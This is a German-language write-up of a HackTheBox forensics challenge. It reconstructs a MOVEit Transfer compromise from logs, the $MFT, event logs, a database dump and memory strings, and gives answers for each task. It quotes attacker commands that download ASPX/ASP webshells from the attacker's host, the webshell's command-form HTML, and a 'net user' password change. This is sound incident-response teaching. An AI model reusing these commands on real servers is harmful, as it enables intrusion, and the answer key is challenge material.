i-like-to

	Veröffentlicht	2023-11-13
	Retired	2023-11-17
	Autor	sebh24

Szenario

Leider haben wir uns wohl unter einem Stein versteckt und die vielen Nachrichtenartikel übersehen, die auf die kürzlich ausgenutzte MOVEit CVE in freier Wildbahn hinweisen. Wir glauben, dass unser Windows-Server möglicherweise anfällig ist und kürzlich Opfer dieses Angriffs geworden ist. Wir müssen diesen Exploit etwas genauer verstehen und die Aktionen des Angreifers bestätigen, um einige Details abzurufen, die wir in unsere SOC-Umgebung integrieren können. Wir haben Ihnen eine Auswahl aller notwendigen Artefakte von unserem kompromittierten Windows-Server zur Verfügung gestellt. PS: Eines der Artefakte ist ein Speicherdump, aber wir haben vergessen, die vmss-Datei hinzuzufügen. Hier müssen Sie möglicherweise wieder auf die Grundlagen zurückgreifen…

Task 1

Frage: Name der vom Angreifer hochgeladenen ASPX-Webshell?
Original: Name of the ASPX webshell uploaded by the attacker?

Teil der Triage Daten von KAPE ist die ConsoleHost_history.txt des moveitsvc Benutzers. Sie befindet auf Windows Systemen, sofern vorhanden, für jeden Benutzer getrennt jeweils in %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline und ist dafür verantwortlich aufzuzeichnen, was in die Konsole eingegeben wird. Standardmäßig werden die letzten 4.096 Befehle gespeichert.

0
1
2
3
4
5
6
    cd C:\inetpub\wwwroot
    wget http://10.255.254.3:9001/moveit.asp
    dir
    wget http://10.255.254.3:9001/moveit.asp -OutFile moveit.asp
    dir
    cd C:\MOVEitTransfer\wwwroot
    wget http://10.255.254.3:9001/move.aspx -OutFile move.aspx

Antwort: move.aspx

Task 2

Frage: Welche IP-Adresse hatte der Angreifer?
Original: What was the attacker’s IP address?

Aus der aus Task 1 bekannten ConsoleHost_history.txt lässt sich auch die IP-Adresse des Angreifers ableiten, da dieser die Webshell von dem von ihm kontrollierten System mittels wget bezogen wurde.

Antwort: 10.255.254.3

Task 3

Frage: Welcher Benutzer-Agent wurde für den ersten Angriff verwendet?
Original: What user agent was used to perform the initial attack?

Mit bekannter IP 10.255.254.3 und dem bekanntem Dateinamen move.aspx der Webshell lässt sich aus den vorhandenen IIS Logs u_ex230712.log (standardmäßig unter %SystemDrive%\inetpub\logs\LogFiles und Teil der Triage Daten) ablesen mit welchem User Agent der Angreifer seinen Angriff gestartet hat. Die ersten Anfragen von der IP starten am 12.07.2023 ab 10:11:15 mit *Nmap+Scripting+Engine* bis 10:11:23, hier wurde das System mittels nmap abgescannt. Anschließend kommt eine reguläre GET-Request von der IP von einem Firefox eines *Linux+x86_64* Systems auf / - diese wird via HTTP Response 302 nach /human.aspx umgeleitet und es werden zusätzliche Dateien für die Website angefordert. Um 10:21:52 ändert sich der User-Agent erneut: ab hier starten Anfragen von einem Client der sich nur als Ruby identifiziert und dabei mehrfach verschiedene GET und POST Requests sendet.

104
105
106
107
108
109
110
111
112
113
114
115
    2023-07-12 10:21:52 10.10.0.25 GET / - 443 - 10.255.254.3 Ruby - 200 0 0 78
    [...]
    2023-07-12 10:21:53 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 818
    [...]
    2023-07-12 10:21:53 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 206
    2023-07-12 10:24:52 10.10.0.25 GET / - 443 - 10.255.254.3 Ruby - 200 0 0 89
    [...]
    2023-07-12 10:24:52 10.10.0.25 GET /moveitisapi/moveitisapi.dll action=m2 443 - 10.255.254.3 Ruby - 200 0 0 131
    2023-07-12 10:24:54 10.10.0.25 POST /guestaccess.aspx - 443 - 10.255.254.3 Ruby - 200 0 0 494
    2023-07-12 10:24:54 10.10.0.25 POST /guestaccess.aspx - 443 - 10.255.254.3 Ruby - 200 0 0 677
    2023-07-12 10:24:55 10.10.0.25 POST /api/v1/token - 443 - 10.255.254.3 Ruby - 200 0 0 603
    2023-07-12 10:24:57 10.10.0.25 GET /api/v1/folders - 443 - 10.255.254.3 Ruby - 200 0 0 920

Dieses Anfrage Verhalten deckt sich mit Veröffentlichungen zu dem MOVEIt Transfer RCE (CVE-2023-34363), es handelt sich hierbei um einen Angriffsversuch.

Antwort: Ruby

Task 4

Frage: Wann wurde die ASPX-Webshell vom Angreifer hochgeladen?
Original: When was the ASPX webshell uploaded by the attacker?

Außerdem Teil der Triage Daten ist eine Kopie des Masterdateitabelle $MFT des NFTS Systems, dem Dateisystem von Microsoft. Hier werden alle Metadaten zu allen vorhandenen (und teils gelöschten) Dateien auf der Festplatte gespeichert. Diese Tabelle lässt sich mit MFTECmd von Eric Zimmerman in ein zur Weiterverarbeitung geeignetes Format (CSV, JSON) wandeln. Der Eintrag 1.293 gilt der gesuchten Datei move.aspx und zeigt (gekürzt) als Zeitstempel der Erstellung 11:24:30 am 12.07.2023, was auch in die bisher bekannte Timeline passt.

0
1
2
3
4
5
6
    {
        "EntryNumber": 1293,
        "ParentPath": ".\\MOVEitTransfer\\wwwroot",
        "FileName": "move.aspx",
        "FileSize": 1400,
        "Created0x10": "2023-07-12T11:24:30.4297594+00:00"
    }

Antwort: 12/07/2023 11:24:30

Task 5

Frage: Der Angreifer hat eine ASP-Webshell hochgeladen, die nicht funktioniert hat. Wie groß ist die Dateigröße in Bytes?
Original: The attacker uploaded an ASP webshell which didn’t work, what is its filesize in bytes?

Wie in dem Task zuvor gesehen, enthält die erstellte mft.json aus der Masterdateitabelle des NFTS Systems auch die Dateigröße der erstellten und gelöschten Dateien. Aus der ConsoleHost_history.txt aus Task 1 ist der Dateiname der ASP-Webshell bekannt: moveit.asp Für diese Datei gibt es zwei Einträge (100.896 und 273.729), da der Angreifer zwei Versuche unternommen hat sie zu speichern - beide haben unterschiedliche Zeitstempel und Pfade, sind ansonsten allerdings identisch.

0
1
2
3
4
5
6
    {
        "EntryNumber": 100896,
        "ParentPath": ".\\MOVEitTransfer\\wwwroot",
        "FileName": "moveit.asp",
        "FileSize": 1362,
        "Created0x10": "2023-07-12T11:19:37.3316397+00:00"
    }

Antwort: 1362

Task 6

Fehler in der HTB Nummerierung - ist ausgelassen

Task 7

Frage: Mit welchem Tool hat der Angreifer zunächst den anfälligen Server aufgelistet?
Original: Which tool did the attacker use to initially enumerate the vulnerable server?

Wie bereits in Task 3 bei der Suche nach dem ersten Angriff festgestellt, kann in den IIS Logs unter u_ex230712.log auch der User Agent Mozilla/5.0+(compatible;+Nmap+Scripting+Engine;+https://nmap.org/book/nse.html gefunden werden. Dies deutet auf das gesuchte Werkzeug.

Antwort: nmap

Task 8

Frage: Wir vermuten, dass der Angreifer möglicherweise das Passwort für unser Service-Konto geändert hat. Bitte bestätigen Sie die Uhrzeit, zu der dies passiert ist (UTC).
Original: We suspect the attacker may have changed the password for our service account. Please confirm the time this occurred (UTC)

Neben den bisher verarbeiteten Log-Dateien enthält das Triage Paket auch Windows Event Logs. Diese können in Windows mit dem Event Viewer angezeigt und gefiltert werden. Alternativ können sie beispielsweise mit EvtxECmd in CSV oder JSON gewandelt werden, oder mit hayabusa von Yamato-Security aggregiert und vorgefiltert werden zur anschließenden Weiterverwendung. Windows speichert versuchte Passwortänderungen die ein User vornimmt mit der EventID 4723 und versuchte Passswort Resets mit der Event ID 4724 im Security Log. In den bisher bekannten Zeitraum und auf den bekannten User passt nur einer der Einträge.

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    - <System>
        <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" /> 
        <EventID>4724</EventID> 
        <Version>0</Version> 
        <Level>0</Level> 
        <Task>13824</Task> 
        <Opcode>0</Opcode> 
        <Keywords>0x8020000000000000</Keywords> 
        <TimeCreated SystemTime="2023-07-12T11:09:27.8648235Z" /> 
        <EventRecordID>60772</EventRecordID> 
        <Correlation ActivityID="{c2cb8fb7-9dd8-0001-2d90-cbc2d89dd901}" /> 
        <Execution ProcessID="652" ThreadID="8052" /> 
        <Channel>Security</Channel> 
        <Computer>mover</Computer> 
        <Security /> 
    </System>
    - <EventData>
        <Data Name="TargetUserName">moveitsvc</Data> 
        <Data Name="TargetDomainName">MOVER</Data> 
        <Data Name="TargetSid">S-1-5-21-4088429403-1159899800-2753317549-1006</Data> 
        <Data Name="SubjectUserSid">S-1-5-21-4088429403-1159899800-2753317549-1006</Data> 
        <Data Name="SubjectUserName">moveitsvc</Data> 
        <Data Name="SubjectDomainName">MOVER</Data> 
        <Data Name="SubjectLogonId">0x8d5ab</Data> 
    </EventData>
  </Event>

Antwort: 12/07/2023 11:09:27

Task 9

Frage: Welches Protokoll hat der Angreifer genutzt, um sich remote auf die kompromittierte Maschine einzuloggen?
Original: Which protocol did the attacker utilize to remote into the compromised machine?

Neben den zuvor erwähnten Passwortänderungen speichert das Windows Event Log auch jeden Login jedes Nutzers mit der Event ID 4624. Die unterschiedlichen Login Arten lassen sich durch das Attribut LogonType unterscheiden, dabei gilt (gekürzt):


`2`	Interactive: Passwort Eingabe an der Tastatur oder RUNAS
`3`	Network: net use oder PowerShell WinRM
`5`	Service: Start eines Services als ein Benutzer
`10`	RemoteInteractive: Login via Terminal oder RDP

Da sich die Frage auf eine Remote Verbindung bezieht sind nur die Events mit LogonType 3 oder 10 interessant. Für den bekannten Zeitraum und mit dem kompromittierten Benutzer kommen drei Events in Frage (60.776, 60.793 und 60.794), alle drei von der IP des Angreifers, wobei die letzten beiden mit LogonType=10 einen Login via RDP vermelden.

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[
    {
        "Timestamp": "2023-07-12 13:11:15.849 +02:00",
        "EventID": 4624,
        "RecordID": 60776,
        "RuleTitle": "Logon (Network)",
        "Details": {
            "SrcIP": "10.255.254.3",
            "TgtUser": "moveitsvc",
            "Type": "3 - NETWORK"
        }
    },
    {
        "Timestamp": "2023-07-12 13:11:18.665 +02:00",
        "EventID": 4624,
        "RecordID": 60793,
        "RuleTitle": "Logon (RemoteInteractive (RDP)) *Creds in memory*",
        "Details": {
            "SrcIP": "10.255.254.3",
            "TgtUser": "moveitsvc",
            "Type": "10 - REMOTE INTERACTIVE"
        }
    },
    {
        "Timestamp": "2023-07-12 13:11:18.665 +02:00",
        "EventID": 4624,
        "RecordID": 60794,
        "RuleTitle": "Logon (RemoteInteractive (RDP)) *Creds in memory*",
        "Details": {
            "SrcIP": "10.255.254.3",
            "TgtUser": "moveitsvc",
            "Type": "10 - REMOTE INTERACTIVE"
        }
    }
]

Antwort: RDP

Task 10

Frage: Bitte bestätigen Sie das Datum und die Uhrzeit, zu der der Angreifer remote auf die kompromittierte Maschine zugegriffen hat.
Original: Please confirm the date and time the attacker remotely accessed the compromised machine?

Mit dem Event aus dem vorherigen Task lässt sich der Zeitpunkt des Remotezugriffs des Angreifers festlegen. Bedingt durch die Zeitangabe "Timestamp": "2023-07-12 13:11:18.665 +02:00" des Analyse-Systems muss 2 Stunden von dem angezeigten Zeitstempel abgezogen werden um die gewünschte UTC Zeit zu errechnen. Bei Prüfung des originalen Events aus der Triage Datei kann dies verifiziert werden: <TimeCreated SystemTime="2023-07-12T11:11:18.6654341Z" />

Antwort: 12/07/2023 11:11:18

Task 11

Frage: Welchen User-Agent hat der Angreifer verwendet, um auf die Webshell zuzugreifen?
Original: What was the useragent that the attacker used to access the webshell?

Mit bekanntem Namen der Webshell aus Task 1, sowie der bekannten IP des Angreifers aus Task 2 lässt sich der Zugriff auf die Webshell aus den IIS Logs ablesen.

350
351
2023-07-12 11:24:43 10.10.0.25 GET /move.aspx - 443 - 10.255.254.3 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 200 0 0 1179
2023-07-12 11:24:47 10.10.0.25 POST /move.aspx - 443 - 10.255.254.3 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 https://moveit.htb/move.aspx 200 0 0 159

Antwort: Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0

Task 12

Frage: Was ist die Instanz-ID des Angreifers?
Original: What is the inst ID of the attacker?

Das noch nicht genutztes Artefakt aus dem Triage Paket moveit.sql ist ein Datenbankdump aus Mysql 10.13 und beschreibt die Datenbank des Services. Diese Tabelle kann entweder wieder in eine Datenbank importiert werden und weiter ausgewertet werden, oder direkt in Textform verarbeitet werden. Darin findet sich eine Tabelle log in der alle Aktionen des Services mitgeschrieben wurden. Im Datenbankdump ist der INSERT Befehl in Zeile 1.611 und enthält alle Aktionen unterschiedlicher Instanzen. Am bekannten Tag sind 16 Zugriffe geloggt.

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
INSERT INTO `log` VALUES 
(40,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','c66788d4d7ca1da7f57f2238b840663009cfcca8','',0,'','',40,0),
(41,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','f46377dcbb1bd462d0ba5bbd05ee7a7b6fa4335f','',0,'','',40,0),
(42,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','4cf54d4aa541ca00525e5ce8a4bff53da36faa29','',0,'','',40,0),
(43,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','de1128b8551c7b201b93d06c4e9499b437f55ae4','',0,'','',40,0),
(44,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','804fc0419b81ba9360ce0efe4bc14e238cb9ba86','',0,'','',40,0),
(45,'2023-07-12 02:11:15','sec_signon',3636,'anonymous',0,'','10.255.254.3',2417,'FTP','','','','Insecure FTP is not enabled','MOVEit Transfer FTP','15.0.0.31',0,0,'','',0,'','','c745089b0778ac200e9d9e72fd6aa6defee6f0fd','',0,'','',40,0),
(50,'2023-07-12 02:25:03','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','b8e83822ff1d4578dd4908afb8c44f95bc3c8046','',966871855,'/Messages/Global Messaging','',10,0),
(51,'2023-07-12 02:25:55','sec_signon',3636,'vcjoaquq',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser','102.0',0,0,'','',0,'','','1ec28c66956851f6060f28b17b60354911c5f390','',0,'','',10,0),
(52,'2023-07-12 02:26:15','sec_signon',3636,'icfshlla',0,'','10.255.254.3',2050,'','','','','Failed to sign on: There is no such user','Firefox Browser','102.0',0,0,'','',0,'','','e3b18a7f31a1578d044395b1a1e2f3671aff6bb5','',0,'','',10,0),
(57,'2023-07-12 02:47:11','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','9a483b59e0960ab38798ceea5900842e11b46216','',966871855,'/Messages/Global Messaging','',10,0),
(62,'2023-07-12 03:01:05','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','4076bf57319439239ea8f145fd3450f6f312542b','',966871855,'/Messages/Global Messaging','',10,0),
(67,'2023-07-12 03:01:56','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','af7dbfa81b0f63f6122e0a8aa736ec76d7cbc659','',966871855,'/Messages/Global Messaging','',10,0),
(72,'2023-07-12 03:04:43','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','189992f80c8b6e881fc18f48f46ab90da25e6e41','',966871855,'/Messages/Global Messaging','',10,0),
(77,'2023-07-12 03:06:42','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','ff49964e7ac34421ffb354279137a20d56e5d52f','',966871855,'/Messages/Global Messaging','',10,0),
(82,'2023-07-12 03:07:30','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','06b088eb422d27f7405ae0959b7a4d516745acb2','',966871855,'/Messages/Global Messaging','',10,0),
(87,'2023-07-12 03:08:37','msg_post',1234,'Guest:[email protected]',966871855,'0','10.255.254.3',4400,'','0','','','Package must have at least one valid recipient.','Ruby','',0,0,'','/Messages/Global Messaging',0,'','','f7d509bea8c67ed46f339f053fd0e648aad4088d','',966871855,'/Messages/Global Messaging','',10,0);

Hierbei sind jeweils 8 Zugriffe von einer Inst 3636 und die restlichen 8 von 1234. Die ersten 8 sind (missglückte) Versuche via FTP auf den Dienst zuzugreifen. Eine Google Suche nach InstID 1234 und dem CVE ergibt mehrere Ergebnisse, zb ein PoC von sfewer-r7 (in Ruby) oder auch dem Metasploit Modul (mit Referenz zu dem genannten PoC)

Antwort: 1234

Task 13

Frage: Welcher Befehl wurde vom Angreifer ausgeführt, um die Webshell abzurufen?
Original: What command was run by the attacker to retrieve the webshell?

Aus der in Task 1 genutzten ConsoleHost_history.txt ist der Befehl ersichtlich.

Antwort: wget http://10.255.254.3:9001/move.aspx -OutFile move.aspx

Task 14

Frage: Was war der Text im Titel-Header der von dem Angreifer bereitgestellten Webshell?
Original: What was the string within the title header of the webshell deployed by the TA?

Da es (siehe Szenario Beschreibung) keine vmss zu dem vmem Image gibt kann keine erweiterte Speicheranalyse vorgenommen werden. Allerdings können mittels strings Befehl alle Zeichenketten aus dem Dump ausgelesen werden und durchsucht werden. Um den Titel der Webshell zu finden kann nach dem aus Task 1 bekannten Dateinamen move.aspx gesucht werden. Einer der Treffer enthält auch den Titel der Webshell

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
<HTML>
    <HEAD>
        <title>awen asp.net webshell</title>
    </HEAD>
    <body >
        <form name="cmd" method="post" action="./move.aspx" id="cmd">
            <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2MjA0MDg4ODhkZNVOZ3tV2TCTi+hEkha/q+A+5xP6tvrMtJaEupnndGLi" />
            <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="678AED88" />
            <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAANhi3zf7ocw6tYhjdSr5BwWitssAmaVIY7AayhB9duwcnk2JDuMxrvKtMBUSvskgfEkJOF+BOsGxdOjAd7jGUjGbwkQ2wl4sKonDxvg+iiKWg==" />
            <input name="txtArg" type="text" value="whoami" id="txtArg" style="width:250px;Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" />
            <input type="submit" name="testing" value="excute" id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" />
            <span id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px">Command:</span>
        </form>
    </body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->

Durch die Kommentare am Ende der Datei kann die Webshell identifiziert werden, es handelt sich hierbei um eine aspx Webshell und diese kann zb. im Repository von BlackArch bei Github eingesehen werden.

Antwort: awen asp.net webshell

Task 15

Frage: Zu welchem Passwort hat der Angreifer das Benutzerkonto ‘moveitsvc’ geändert?
Original: What did the TA change the our moveitsvc account password to?

Die strings Sammlung des vmem Images kann hier genutzt werden um nach Stichworten zu suchen die auf einen Passwort Wechsel deuten. Dazu gehört neben dem Benutzerkontennamen moveitsvc (12.837 Treffer) auch der Befehl net user (75 Treffer) mit dem Benutzerkonten modifiziert werden können, sowie dem PowerShell Modul Set-LocalUser (1 Treffer). Es gibt allerdings nur einen kombinierten Treffer aus net user und moveitsvc, hierbei handelt es sich um den gesuchten Befehl des Angreifers.

350
    net user "moveitsvc" 5trongP4ssw0rd

Antwort: 5trongP4ssw0rd